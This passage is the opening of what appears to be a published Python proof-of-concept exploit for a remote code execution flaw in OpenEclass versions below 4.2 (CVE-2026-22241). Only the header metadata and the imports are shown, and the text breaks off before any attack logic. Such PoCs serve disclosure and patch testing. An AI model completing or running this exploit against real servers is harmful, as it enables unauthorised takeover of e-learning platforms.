GUnet OpenEclass E-learning platform < 4.2 – Remote Code Execution (RCE)
Proof of Concept (PoC)
poc.py
# Exploit Title: GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE)
# Date: 2026-01-08
# Exploit Author: Ashif Iqubal
# Vendor Homepage: https://www.openeclass.org/
# Software Link: https://download.openeclass.org/files/4.1/
# Version: < 4.2
# Tested on: Debian Ubuntu (Apache/2.4.58, PHP 8.3.6, MySQL 8.0.40-0ubuntu0.24.04.1)
# CVE: CVE-2026-22241
import os
import sys
import zipfile
import requests
import argparse
from bs4 import BeautifulSoup
from argparse import RawTextHelpFormatter
RED = '